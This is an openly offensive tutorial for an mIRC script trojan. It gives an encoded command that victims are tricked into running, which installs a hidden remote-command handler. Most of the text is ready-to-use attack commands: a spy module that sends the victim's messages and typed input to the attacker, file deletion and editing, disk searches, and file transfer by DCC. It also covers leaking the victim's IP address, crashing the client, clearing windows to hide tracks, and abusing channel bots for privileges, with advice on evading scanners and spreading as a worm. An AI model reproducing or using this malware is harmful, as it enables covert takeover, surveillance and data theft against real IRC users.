Tutorial IRC trojan

1) Infect the victim


The Trojan can be activated by the victim when he writes the next command:


//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
msg YOURNICK i love you


YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
the ' | msg YOURNICK I love you ' part.


This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
^*:text:ins*:?:{ . $+ $2- | haltdef }

The haltdef will block your messages to the victim beginning with 'ins'. With this the user can’t see your commands, so he
wont have a clue who is controlling his mIRC.

Example:

/msg victim ins msg #channel hi

This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
And the victim will not see your message 'ins msg #channel hi' because it will be blocked by  'haltdef'. Nice isn’t it? J


When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
him an excess flood if he is on too much 'popular' channels (channel with much activity). For adding the spy part (it will send
you all his activity, messages received, message sent and commands executed) execute the next commands:


2) Spy the victim:

/msg victim ins write -c myscript.mrc

/msg victim ins unload -rs myscript.mrc

/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }

/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ >
$1- }

/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+
>,[COMMAND]) $1- }

/msg victim ins load -rs myscript.mrc


Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:


/msg victim ins unload -rs myscript.mrc


Note: victim = the nick of the victim who has executed that command, and who has the Trojan.


3) Make other remote files (.mrc)

You can make remote files yourself and add usefull functions in it.

/msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick

/msg victim ins .load –rs YOURSCRIPTNAMEt.mrc


4) Use of the Trojan:

Well this is limited, but this is the main basic: you can make commands yourself, I’ll try to make more advanced commands
later J


REMOVE FILE :

/msg victim ins remove C:\Textfile.txt


OPEN SITE:

/msg victim ins url www.site.com


JOIN CHANNEL:

/msg victim ins join #channel


PART CHANNEL:

/msg victim ins part #channel


QUERY USER:

/msg victim ins query user


MSG USER:

/msg victim ins msg user


INVITE USER:

/msg victim ins invite user #channel


BAN USER:

/msg victim ins ban #channel user


KICK USER:

/msg victim ins kick #channel user


IGNORE USER:

/msg victim ins ignore *!*@host.com


UNIGNORE USER:

/msg victim ins unignore *!*@host.com


CHANGE NICK:

/msg victim ins nick thenickyouwant


OP USER:

/msg victim ins mode #channel +o user


VOICE USER:

/msg victim ins mode #channel +v user


CHANGE TOPIC:

/msg victim ins topic #channel text


RECEIVE FILE:

/msg victim ins dcc send user file

or

/msg victim ins dcc send user C:\something.sth


EDIT TEXT:

/msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit

(-l1 --> first line)


READ A PIECE OF FILE (LIKE PERFORM):

following commands must be executed after eachother:

/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }

/msg victim ins .load -rs mab

/msg victim ins abcd123


SEARCH HARD DISK FOR A FILE:

/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }

/msg victim ins .load -rs MAB1

/msg victim ins MAB1


LET HIS mIRC CRASH:

/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }

/msg victim ins .load -rs MAB2

/msg victim ins MAB2


SCAN HIS HARD DISK AND SAVE IT AS .txt:

//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)


Note: Probably you want this file, well you do this:

/msg victim ins dcc send YOURNICK C:\M_A_B.txt

** Important note **

The victim will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:

/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
.load -rs MyNewScript.mrc


FIND THE VICTIMs IP WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $ip


FIND THE VICTIMs HOST WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $host


FIND THE VICTIMs OS:

/msg victim ins //msg YOURNICK $os


FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:

/msg victim ins //msg YOURNICK $server


FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $time


FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $date


FIND OUT OF THE VICTIM IS AWAY

/msg victim ins //msg YOURNICK $away


FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:

/msg victim ins //msg YOURNICK $serverIP


FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:

/msg victim ins //msg YOURNICK $url


FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:

/msg victim ins //msg YOURNICK $victim


TURN THE AUTO JOIN ON INVITE ON (or OFF)

/msg victim ins ajinvite on


LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:

/msg victim ins amsg <the message you want him to say on all channels>


CHANGE THE VICTIMs ALTERNATIVE NICK:

/msg victim ins anick <nickname>


CHANGE THE VICTIMs BACKGROUND PICTURE:

/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]

with

-a = active window

-m = main mIRC window

-s = status window

-g = finger window

-d = single message window


-e = set as default


-cfnrtp = center, fill, normal, stretch, tile, photo


-l = toolbar

-u = toolbar buttons

-h = switchbar


-x = no background picture


LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:

/msg victim ins channel #CHANNELNAME

Note: the victim must be on #CHANNELNAME


CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:

/msg victim ins clearall [-snqmtgu]

s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.


LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:

/msg victim ins clipboard <the text you want to be clipboarded>


CLOSE THE OPEN QUERIES OF THE VICTIM:

/msg victim ins close


LET THE VICTIM QUIT mIRC:

/msg victim ins quit <the quit message you want>


LET THE VICTIM DISCONNECT FROM SERVER:

/msg victim ins disconnect


LET THE VICTIM CHANGE SERVER:

/msg victim ins server the.server.you.want


LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:

/msg victim ins server -m

/msg victim ins server the.server.you.want


LET THE VICTIM GIVE YOU FLAGS (if he is able to):

/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag

Note:

|TheBot| = the bot who can give flags

Chanlev = can be different, sometimes it is also, "adduser"

flag = the flag you want

YOURNICK = your nick


CHANGE THE VICTIMs FONT AND FONT SIZE:

/msg victim ins font -asgbd <fontsize> <fontname>


CHANGE THE VICTIMs FULL NAME:

/msg victim ins fullname <name>


LET THE VICTIM REJOIN A CHANNEL:

/msg victim ins hop #CHANNEL


MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:

/msg victim ins mkdir <dirname>


NOTE:

victim = nick of the victim

user = your nick

5) Additional Information: this trojan is NOT detectable by any virus scanner, since its a code in mIRC... And remember that
you dont need a file to send to the victim, the victim will make (write) a file by executing that command. If you want to let it
spread by an IRC worm, i would suggest that you used a bot...

by NE0